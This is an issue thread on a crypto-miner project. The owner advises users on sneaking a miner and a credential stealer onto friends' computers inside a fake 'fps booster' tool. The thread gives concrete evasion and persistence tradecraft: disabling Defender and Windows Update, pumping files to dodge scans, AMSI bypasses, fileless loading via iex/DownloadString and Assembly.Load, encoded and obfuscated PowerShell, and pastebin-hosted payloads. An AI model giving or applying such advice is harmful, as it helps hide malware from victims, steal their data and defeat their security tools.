### ISSUE TITLE
Disable Windows Update

### ISSUE THREAD

**Issue by shainodev** [UnamSanctam/SilentCryptoMiner#916]

**Comment by UnamSanctam** [comment]
No but it should stop Windows Defender updates that reinstall/reset all the settings, maybe once a year (or two) Microsoft pushes an update that removes all exclusions and other settings which disabling Windows Update should stop.

**Comment by shainodev** [comment]
> No but it should stop Windows Defender updates that reinstall/reset all the settings, maybe once a year (or two) Microsoft pushes an update that removes all exclusions and other settings which disabling Windows Update should stop.

and also would the watchdog get detected if i make it check if process hacker or task manager is open and if it is then it doesnt do the WD Exclude or open the app or idk

**Comment by UnamSanctam** [comment]
No not really, it shouldn't.

**Comment by shainodev** [comment]
> No not really, it shouldn't.

And perhaps, if i DONT use the start-sleep delay in the powershell encoded command will it get detected if i make it download files or add scheduled startup?

**Comment by UnamSanctam** [comment]
Shouldn't really matter, the sleep delay is mostly only to circumvent sandboxing detections (mainly Windows Defender sandboxing).

**Comment by shainodev** [comment]
so ive made a fps booster for my friends in c++ and it does alot of powershell registry edit things and then ive put a create directory, sleep then download file, and startup scrambled with the real fps boosting commands will i get detected for this?

**Comment by UnamSanctam** [comment]
The command itself shouldn't really get detected but the downloaded file or startup task can get detected of course (unless they use Windows Defender and you have excluded the folders).

**Comment by shainodev** [comment]
what should i do then since they probably will trust whatever the fps booster does (btw i made it disable windows defender so that wont be a problem) but idk what to do about the other av's. how could i make it so other avs dont delete my thing? is there some command that i could do or anything

**Comment by shainodev** [comment]
would pumping the file to 500 mb not make other antiviruses scan my file at all?

**Comment by UnamSanctam** [comment]
It would need to be undetected by antiviruses (FUD), pumping it might work. There are things such as silent uninstallations with wmic (like `wmic product where name="Program Name" call uninstall`) but doing that is quite slow and not all uninstallers are silent, it depends on how the uninstaller was built.

**Comment by shainodev** [comment]
i heard windows will be removing that soon and yeah its too slow i cant use it, i mean scantime it says my miner is 0/26 on antiscan.me, but the problem with pumping is it will download really really slow

**Comment by shainodev** [comment]
oh and one more problem with pumping is that will make it that i cant use discord cause yeah 8 mb max file size and using .rar maybe could work but i cant use powershell then and it still may get detected ive tried before

**Comment by shainodev** [comment]
> Owner

hmm, would adding a "iex(newwebclient).DownloadString(miner)" to taskscheduler work as a fileless persistance?

**Comment by UnamSanctam** [comment]
You can theoretically do `Assembly.Load` on data downloaded from `DownloadData`.

**Comment by shainodev** [comment]
> You can theoretically do `Assembly.Load` on data downloaded from `DownloadData` I think.

uhh that would get really detected, oh and one more question are you still working on the stealer?

**Comment by shainodev** [comment]
> You can theoretically do `Assembly.Load` on data downloaded from `DownloadData` I think.

and alsooooo what would be the best way to add a stealer to my fps booster would just adding wd exclusions disable windows update then sleep 12 seconds and downloader my miner and then sleep 6 seconds and download my really stealer and startprocess and then add scheduled task startup to my miner work?

**Comment by UnamSanctam** [comment]
Sure that would work, currently I'm working on the miner and a crypto clipper (but mainly on the miner), I just finished the translation system.

**Comment by UnamSanctam** [comment]
Could slightly change runtime detections for some other antiviruses though it's not the most important one to change unless everything else is undetected.

**Comment by shainodev** [comment]
> Could slightly change runtime detections for some other antiviruses though it's not the most important one to change unless everything else is undetected.

hmm, which would be better to drop to C:\Program Files (x86)\NVIDIA Corporation\nvcontainer.exe and then task scheduler startup that just does Start Program: C:\Program Files (x86)\NVIDIA Corporation\nvcontainer.exe. ORR should i make my fps booster add to startup a amsi bypass then [Reflection.Assembly]::Load([System.Convert]::FromBase64String(DOWNLOADER)).EntryPoint.Invoke(0,$Null) that downloads a base64 of my miner every 5 minutes and opens it, or will get detected

**Comment by UnamSanctam** [comment]
Either works though for fileless you'll probably also need an AMSI bypass in the command and you should probably do an EncodedCommand of it if you can.

**Comment by varysuzuki** [comment]
> Either works though for fileless you'll probably also need an AMSI bypass in the command and you should probably do an EncodedCommand of it if you can.

i tried doing the amsi bypass (r77 rootkit's one) but it was detected will it be undetected if id use encodedcommand? and wouldnt fileless be better and less detected?

**Comment by UnamSanctam** [comment]
> i tried doing the amsi bypass (r77 rootkit's one) but it was detected will it be undetected if id use encodedcommand? and wouldnt fileless be better and less detected?

Maybe, usually the "fileless" bytes for the program is stored in the registry or similar places so that can get detected as well.

**Comment by varysuzuki** [comment]
> > i tried doing the amsi bypass (r77 rootkit's one) but it was detected will it be undetected if id use encodedcommand? and wouldnt fileless be better and less detected?
> 
> Maybe, usually the "fileless" bytes for the program is stored in the registry or similar places so that can get detected as well.

yeah but i wont be doing that ill make downloaddata as reversed base64 from gg.gg directing to pastebin so i can change the link, so would i be fine and not get detected if id reobfuscate my miner every week aswell?

**Comment by UnamSanctam** [comment]
Sure that could maybe work, I've never tried it.

**Comment by shainodev** [comment]
> Either works though for fileless you'll probably also need an AMSI bypass in the command and you should probably do an EncodedCommand of it if you can.

even with encodecommand the command gets detected

**Comment by UnamSanctam** [comment]
You can try with https://github.com/danielbohannon/Invoke-Obfuscation, it's what I did for the new rootkit update (for the upcoming version).

**Comment by shainodev** [comment]
would it be better to do an iex(downloaddata(download the whole encodedcommand from gg.gg (pastebin redirect) so i can randomize it when it gets detected))?

**Comment by UnamSanctam** [comment]
Sure, you can do that, it might help.

**Comment by shainodev** [comment]
> Sure, you can do that, it might help.

yo should i make the dropper ShellExecuteA and put both download stealer; download miner in the powershell command or should i do it seperately? cause if i dont do it seperately it might close powershell and not download miner if the download stealer gets detected

**Comment by UnamSanctam** [comment]
Either will work, though you can do it separately for safety.
